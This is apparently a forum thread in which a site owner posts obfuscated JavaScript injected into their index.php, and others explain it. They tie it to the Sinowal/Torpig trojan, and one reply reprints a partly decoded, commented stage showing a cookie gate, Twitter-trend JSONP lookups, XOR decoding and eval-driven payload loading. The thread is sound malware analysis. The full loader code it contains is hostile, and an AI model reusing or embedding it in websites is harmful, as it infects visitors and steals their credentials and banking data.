
Please help me decipher mysterious cryptic code - strangely placed in my index.php

Someone maliciously inserted the following code into my website ahoffmanawning.com. Could this be done via a poorly written form php script? Also more importantly, what is this script doing?


<script language="javascript">
// Stage 0 of the injected script.  $a is one long string in which every '%' of a
// percent-encoded JavaScript fragment has been replaced by 'Z'; z() below reverses
// that substitution, unescape()s the result, and eval() runs it.
// NOTE: the page's copy of the string is hard-wrapped across several lines, and the
// second line carries a site watermark fragment ("开发者_高级运维") that is not part
// of the sample, so the listing is not syntactically valid exactly as shown here.
$a="Z63dZ3dZ22Z253dst+Z2553tZ2572iZ256eg.Z2566Z2572oZ256dCZ2568arCZ256fdeZ2528(tmZ2570Z252eZ2563hZ22;dzZ3dZ22Z2566Z2575nZ2563tZ2569on Z2564wZ2528t)Z257bcaZ253dZ2527Z252564Z25256fcZ252575mZ252565Z256eZ2574.Z252577ritZ252565Z25252Z2538Z252522Z2527;ceZ253dZ2527Z25252Z2532)Z2527;cZ2562Z253dZ2527Z25253cscrZ252569pZ252574Z2520Z25256caZ25256eguZ252561gZ252565Z25253dZ25255cZ252522Z256aaZ2576aZ2573Z2563Z252572iZ252570tZ2525Z2535Z2563Z252522Z25253Z2565Z2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ252572Z2569Z252570Z252574Z25253eZ2527;eZ2576aZ256c(unZ2565scaZ2570e(Z2574))Z257dZ253bZ22;caZ3dZ22Z2566Z2575Z256ecZ2574iZ256fn dZ2563sZ2528ds,Z2565sZ2529Z257bdsZ253duneZ2573capZ2565Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv08gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;opZ3dZ22Z2524Z2561Z253dZ2522dw(dcsZ2528cu,Z25314)Z2529;Z2522Z253bZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564aZ252bdZ2562Z252bZ2564Z2563+Z2564dZ252bdZ2565Z252c1Z2530)Z253bdZ2577(Z2573Z2574Z2529;Z2573tZ253dZ2524aZ253bZ2522;Z22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d
7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;czZ3dZ22Z2566Z2575Z256eZ2563tioZ256eZ2520czZ2528cz)Z257brZ2565tuZ2572n Z2563aZ252bcb+Z2563cZ252bcdZ252bce+Z2563Z257aZ253b}Z253bZ22;ceZ3dZ22aZ2572Z2543odZ2565AtZ25280)Z255eZ2528Z25270x0Z2530Z2527+eZ2573))Z2529;Z257dZ257dZ22;ccZ3dZ225ngtZ2568Z253bZ2569+Z252b)Z257btmpZ253ddZ2573.Z2573licZ2565(iZ252ci+Z2531);Z2573tZ22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2开发者_高级运维526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;cbZ3dZ22(Z2564s);Z2573tZ253dtmZ2570Z253dZ2527Z2527;forZ2528Z2569Z253d0Z253bZ2569Z253cds.lZ256Z22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sz|KZ2520;64c}p`|)Z25$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;Z69Z66Z20(Z64Z6fcuZ6denZ74.coZ6fkieZ2eindZ65xOZ66Z28Z27rf5fZ36Z64sZ27)Z3dZ3d-1)Z7bfunZ63Z74iZ6fn Z63allZ62aZ63Z6b(xZ29Z7bwindoZ77.tZ77Z20Z3d x;Z76Z61rZ20dZ20Z3dZ20newZ20DZ61tZ65Z28);dZ2eseZ74TiZ6de(Z78Z5bZ22as_Z6fZ66Z22]*Z31Z30Z300);Z76arZ20hZ20Z3dZ20dZ2egZ65tZ55TCHZ6fursZ28);Z77iZ6edZ6fwZ2ehZ20Z3d h;if Z28h Z3e 
8)Z7bd.sZ65tZ55TCDZ61Z74eZ28d.gZ65tUZ54CZ44Z61Z74Z65()Z20-Z202);Z7delsZ65Z7bd.seZ74UTCZ44ateZ28d.Z67etUZ54CDaZ74e()Z20Z2d Z33)Z3b}wZ69ndZ6fw.gZ64Z20Z3d d;Z76arZ20tiZ6dZ65 Z3d Z6eewZ20ArZ72Z61y(Z29;vaZ72 shZ69ftZ49nZ64Z65xZ20Z3dZ20Z22Z22;timeZ5bZ22yearZ22] Z3d d.Z67etUZ54CFuZ6clZ59earZ28)Z3btimZ65[Z22moZ6etZ68Z22] Z3d dZ2egeZ74UZ54Z43MoZ6etZ68()+Z31;tZ69mZ65[Z22daZ79Z22] Z3d d.gZ65tUZ54CZ44aZ74e(Z29;ifZ20(dZ2egZ65tZ55TZ43MZ6fntZ68()+Z31 Z3cZ2010)Z7bshiZ66Z74IZ6edeZ78 Z3d timZ65[Z22yearZ22] +Z20Z22-0Z22 +Z20Z28d.gZ65tUTZ43MonZ74h(Z29+Z31Z29;}Z65Z6csZ65Z7bshifZ74InZ64eZ78 Z3d tZ69meZ5bZ22yearZ22] +Z20Z22Z2dZ22 Z2b (dZ2egeZ74Z55TCZ4donZ74h(Z29+Z31);Z7dZ69f Z28dZ2eZ67Z65tUZ54CDZ61teZ28Z29 Z3c 10Z29Z7bsZ68ifZ74IndZ65x Z3dshZ69ftZ49ndeZ78 + Z22Z2dZ30Z22 + dZ2eZ67Z65tUZ54CZ44aZ74e()Z3b}eZ6cseZ7bshZ69ftIZ6eZ64Z65Z78 Z3d sZ68ifZ74IZ6edZ65x +Z20Z22-Z22 +Z20dZ2eZ67etUZ54CDZ61tZ65()Z3b}dZ6fcZ75Z6dentZ2ewZ72iZ74Z65Z28Z22Z3cscrZ22+Z22ipt Z6caZ6eguZ61geZ3djZ61vasZ63rZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fsearchZ2eZ74wiZ74teZ72.coZ6dZ2ftrZ65nZ64Z73Z2fdaZ69Z6cyZ2eZ6asonZ3fdatZ65Z3dZ22+ shiZ66tInZ64eZ78Z2bZ22&Z63allZ62Z61Z63Z6bZ3dcallbZ61ck2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 Z2b Z22iZ70Z74Z3eZ22);Z7d fZ75nZ63tioZ6e Z63Z61lZ6cbZ61cZ6b2(Z78)Z7bwindZ6fZ77.tZ77Z20Z3d x;Z73c(Z27rf5Z666dZ73Z27,2,7)Z3bevaZ6c(Z75Z6eesZ63apeZ28dzZ2bZ63zZ2bopZ2bsZ74)+Z27dwZ28Z64z+cZ7a($Z61+stZ29Z29;Z27);dZ6fcZ75menZ74.Z77ritZ65(Z24a)Z3b}dZ6fZ63umeZ6et.wZ72iteZ28Z22Z3cimgZ20sZ72cZ3dZ27http:Z2fZ2fseZ61rcZ68Z2etZ77Z69tteZ72.coZ6dZ2fZ69mZ61Z67eZ73Z2fseZ61rcZ68Z2frss.Z70ngZ27 wZ69dtZ68Z3d1Z20Z68Z65ighZ74Z3d1 stZ79lZ65Z3dZ27visibilZ69tZ79:hiZ64deZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6cangZ75agZ65Z3djavZ61sZ63riZ70tZ22+Z22 srcZ3dZ27httZ70:Z2fZ2fseaZ72ch.Z74Z77ittZ65rZ2ecomZ2fZ74renZ64sZ2fdaiZ6cy.jZ73Z6fn?cZ61lZ6cZ62ackZ3dcaZ6clbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22ipZ74Z3eZ22);Z7deZ6csZ65Z7b$aZ3dZ27Z27};functionZ20sZ63Z28Z63nm,Z76Z2cedZ29Z7bvar 
eZ78dZ3dnewZ20DatZ65()Z3beZ78d.Z73Z65tZ44aZ74Z65Z28exdZ2egeZ74Z44aZ74Z65Z28)Z2bedZ29;dZ6fcZ75menZ74.cZ6fokiZ65Z3dcnZ6d+ Z27Z3dZ27 +esZ63apeZ28v)Z2bZ27;expiZ72esZ3dZ27+eZ78Z64.Z74Z6fZ47Z4dTZ53Z74rinZ67();Z7dZ3b";
// z(): rebuilds the percent-encoded text by swapping 'Z' for '%' one character at a
// time, then unescape()s it.  r, i and s1 are assigned without var, so they leak as
// globals -- a cheap fingerprint of this loader in a page's global scope.
function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}
// The decoded text is executed directly.  Its content is the listing further down
// this page (the one beginning with cd="%3dst+...).
eval(z($a));
</script>


To reiterate: Nobody run this in your browser kthx

That is obfuscated JavaScript code; none of us likely has enough time to decode it for you, but if you don't know how it got there, it is almost certainly malicious code that will try to install malware using some browser vulnerability or another.

As to how it got there: someone got access to your server files.
This could be (in order of likelihood):

  • someone discovered a php vulnerability which gave them access to your file-system
  • someone got access to your ftp info
  • you have a malicious coder
  • or perhaps there's a vulnerability with the web-server, database, operating system, or some service running on your server.

I would change your FTP password, update every conceivable thing in your system to the latest version, and take a serious look at any custom PHP code that accesses the file-system.


[Edit]: From the link given by dth, it appears that code downloads and executes a trojan (virus) called Sinowal.

This trojan attempts to steal different system and account information from the infected machine. Stolen information may include the following:

• IMAP/POP3/SMTP username, passwords, server information from mail clients such as AK-Mail, Thunderbird, TheBat
• Bookmarks
• E-mail addresses from the Windows Address Book
• Passwords and other data stored from FTP clients such as Trellian FTP, WS_FTP, Total Commander, Crystal FTP Pro and GlobalSCAPE

It also monitors web browsers such as Internet Explorer, Firefox, and Mozilla for online banking information


This is what it does. It seems to start with just garbage to hide what it does, but at the end there is some Twitter posting going on, I think. Enjoy!

// Stage 1 of the injected script: the text that the question's wrapper produces once
// z() has turned every 'Z' back into '%' and unescape()d it, and that eval(z($a))
// then runs.  The page's copy was hard-wrapped at 80 columns, cutting several string
// literals in half (e.g. '%6' / '9on'); the lines are rejoined here so that each
// assignment stands on its own.  Every token is as on the page.
//
// Nothing below is the final payload.  The fifteen strings are further-encoded pieces
// that the code at the bottom assembles and eval()s, and only after a JSONP
// round-trip to search.twitter.com has populated window.tw.

// cd, cb, cc, ce and ca are percent-encoded fragments.  cz() (see below) glues them
// together as ca+cb+cc+cd+ce; unescaped, that text is a small XOR decoder:
//   function dcs(ds,es){ds=unescape(ds);st=tmp='';for(i=0;i<ds.length;i++){
//     tmp=ds.slice(i,i+1);st=st+String.fromCharCode((tmp.charCodeAt(0)^('0x00'+es)));}}
// i.e. each character is XORed with the key ('0x00'+es) and the output is left in the
// global `st` -- dcs() itself returns nothing.
cd="%3dst+%53t%72i%6eg.%66%72o%6dC%68arC%6fde%28(tm%70%2e%63h";
// dz decodes to `function dw(t){ca='…';ce='…';cb='…';cc='…';eval(unescape(t))};` --
// dw() first re-points ca/cb/cc/ce at the (still percent-encoded) pieces of a
// document.write("<script language=\"javascript\">…</script>") wrapper, then
// eval()s its argument.
dz="%66%75n%63t%69on %64w%28t)%7bca%3d%27%2564%256fc%2575m%2565%6e%74.%2577rit%2565%252%38%2522%27;ce%3d%27%252%32)%27;c%62%3d%27%253cscr%2569p%2574%20%256ca%256egu%2561g%2565%253d%255c%2522%6aa%76a%73%63%2572i%2570t%25%35%63%2522%253%65%27;cc%3d%27%253c%255c%252fsc%2572%69%2570%2574%253e%27;e%76a%6c(un%65sca%70e(%74))%7d%3b";
ca="%66%75%6ec%74i%6fn d%63s%28ds,%65s%29%7bds%3dune%73cap%65";
// da, db, dc, dd, de: one XOR-encoded blob (key 0x10 -- `st` below passes 10 as es).
// Its decoded text references window.tw.trends, the Twitter trend list fetched by
// the JSONP loads at the bottom, which agrees with the page's own description; what
// it derives from those trends is not visible without running the decoder.
da="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyvdY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t%7Fg>dg>dbu~tc9kyv08gy~t%7Fg>x0.0(0660gy~t%7Fg>x0,0%22!0660y>y~tuh_v870%20'790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mu|cu0yv088gy~t%7Fg>x0,0)0ll00gy~t%7Fg>x0.0%22%2090660y>y~tuh_v870!(790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>d";
// op decodes to `$a="dw(dcs(cu,14));";` -- the first driver line callback2() eval()s.
op="%24%61%3d%22dw(dcs%28cu,%314)%29;%22%3b";
db="g>dbu~tcKyMK$M>aeubi>sxqbS%7FtuQd8!90;0!%20;gy~t%7Fg>dg>dbu~tcKyMK$M>aeubi>|u~wdx+rbuq{+mmyv08cxyvdY~tuh0.0%209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~t%7Fg>wt>wudEDSVe||Iuqb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89+fqb0t-7vrs}vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7<07dxb7<07vyb7<07fyv7<07huc";
// st decodes to `st="$a=st;dcs(da+db+dc+dd+de,10);dw(st);st=$a;";` -- the second
// driver line: keep the cu result in $a, decode the da..de blob, eval() it via dw().
st="%73t%3d%22$%61%3ds%74;%64c%73(%64a%2bd%62%2b%64%63+%64d%2bd%65%2c1%30)%3bd%77(%73%74%29;%73t%3d%24a%3b%22;";
dc="7<07fuc7<07wxd7<07u~y7<07ud~7<07|uf7<07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t7<7u7<7v7<7w7<7x7<7z7<7y7<7{7<7|7<7}7<7~7<7%7F7<7`7<7a7<7b7<7c7<7d7<7e7<7f7<7g7<7h7<7i7<7j79+fqb0~e}rubc0-0~ug0Qbbqi8!<%22<#<$<%<%26<'<(<)9+%19ve~sdy%7F~0Sq|se|qdu]qwys^e}rub8tqi<0}%7F~dx<0iuqb<0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}%7F~dx0N0tqi90:0y~tuh90;0tqi9+m0f";
// cz decodes to `function cz(cz){return ca+cb+cc+cd+ce+cz;};` (the variable is
// later shadowed by the function of the same name once eval()ed).
cz="%66%75%6e%63tio%6e%20cz%28cz)%7br%65tu%72n %63a%2bcb+%63c%2bcd%2bce+%63%7a%3b}%3b";
ce="a%72%43od%65At%280)%5e%28%270x0%30%27+e%73))%29;%7d%7d";
cc="5ngt%68%3b%69+%2b)%7btmp%3dd%73.%73lic%65(i%2ci+%31);%73t";
dd="qb0iuqbSx!<0iuqbSx%22<0}%7F~dxSx<0tqiSx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0dy}uK7}%7F~dx7M<0dy}uK7iuqb7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060%20hQQ90;0~e}9050%26#9050%22%26M0;0|uddubcK888dy}uK7iuqb7M060%20hQQ90,,0%2290;0~e}9050%22%M+%19iuqbSx%220-0|uddubcK8888dy}uK7iuqb7M060%20h##!!90..0#90;0~e}9050!%209M0;0|uddubcK8888dy}uK7i";
cb="(%64s);%73t%3dtm%70%3d%27%27;for%28%69%3d0%3b%69%3cds.l%6";
de="uqb7M060%20h##!!90..0$90;0~e}9050!%209M+%19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7M0;0~e}9050%22%9M0;0|uddubcK88dy}uK7}%7F~dx7M0:0~e}9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0%269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqbSx%220;0}%7F~dxSx0;0iuqbSx!0;0tqiSx0;0}%7F~dxcKdy}uK7}%7F~dx7M0=0!M0;07>s%7F}79+m";
// cu: XOR-encoded with key 0x14 (op passes 14).  Following op and st, its decoded
// form appears to end up in $a, which callback2() document.write()s into the page.
cu="(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:w{y;xp;sz|K%20;64c}p`|)%$4|q}s|`),$*(;}rfuyq*(;p}b*";

// Whole thing is gated on a marker cookie: 'rf5f6ds' is absent on first contact and is
// set for 7 days by sc() inside callback2(), so a given browser is hit once per week.
// The cookie name is a client-side indicator of this loader.
if (document.cookie.indexOf('rf5f6ds')==-1){
  // JSONP handler for the first daily.json load.  x["as_of"] (epoch seconds) is
  // turned into a Date, moved back 2 days if the UTC hour is past 8 and 3 days
  // otherwise, and formatted as zero-padded YYYY-MM-DD; that date is then used to
  // request a specific day's trends with callback2 as the handler.
  // window.tw, window.h and window.gd are left behind as globals for later stages.
  function callback(x){
    window.tw = x;
    var d = new Date();
    d.setTime(x["as_of"]*1000);
    var h = d.getUTCHours();
    window.h = h;
    if (h > 8){d.setUTCDate(d.getUTCDate() - 2);}else{d.setUTCDate(d.getUTCDate() - 3);}
    window.gd = d;
    var time = new Array();
    var shiftIndex = "";
    time["year"] = d.getUTCFullYear();
    time["month"] = d.getUTCMonth()+1;
    time["day"] = d.getUTCDate();
    if (d.getUTCMonth()+1 < 10){shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);}else{shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);}
    if (d.getUTCDate() < 10){shiftIndex =shiftIndex + "-0" + d.getUTCDate();}else{shiftIndex = shiftIndex + "-" + d.getUTCDate();}
    // "<scr"+"ipt" is split presumably to dodge simple '<script' string matching.
    document.write("<scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=callback2'>" + "</scr" + "ipt>");
  }
  // Second JSONP handler: sets the marker cookie, then eval()s the assembled stages
  // (dw/cz definitions + the op and st driver lines, followed by a dw() call that runs
  // the dcs decoder over them), and finally writes whatever was left in $a into the
  // document.  eval() on data the page did not author is the point where any
  // sandboxing or CSP would have to intervene.
  function callback2(x){
    window.tw = x;
    sc('rf5f6ds',2,7);
    eval(unescape(dz+cz+op+st)+'dw(dz+cz($a+st));');
    document.write($a);
  }
  // Kick-off: a hidden 1x1 image plus the first JSONP <script> (handler: callback).
  // Observable network indicators of this stage are the rss.png fetch and the two
  // daily.json loads on search.twitter.com.
  document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?callback=callback'>" + "</scr" + "ipt>");
}
else{$a=''};
// Cookie helper: sets cnm=escape(v) with an expiry ed days from now.
function sc(cnm,v,ed){
  var exd=new Date();
  exd.setDate(exd.getDate()+ed);
  document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
};


http://wepawet.cs.ucsb.edu/static/torpig-twitter.html has everything decrypted and analysed for you.

Cheers m8.


Looks like it's getting a list of the trending topics on Twitter. Does that give you any more hints as to how it got there?

